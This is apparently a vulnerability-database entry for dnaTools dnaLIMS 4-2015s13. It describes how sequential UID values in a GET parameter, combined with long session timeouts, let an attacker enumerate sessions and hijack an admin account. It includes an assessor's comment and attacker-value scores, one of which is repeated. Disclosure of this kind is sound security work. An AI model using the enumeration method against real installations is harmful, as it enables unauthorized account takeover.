An issue was discovered in dnaTools dnaLIMS 4-2015s13. dnaLIMS is vulnerable to session hijacking by guessing the UID parameter.
Recent assessments:
h00die at March 27, 2020 4:08pm UTC reported:
The uid
field is passed within a GET
parameter. These are sequential integers, so it is trivial to enumerate them all. The session for the UID needs to be valid, and the timeout is rather long. So itβs rather trivial to simply enumerate through them in an infinite loop to get an admin.
Assessed Attacker Value: 3
Assessed Attacker Value: 3Assessed Attacker Value: 5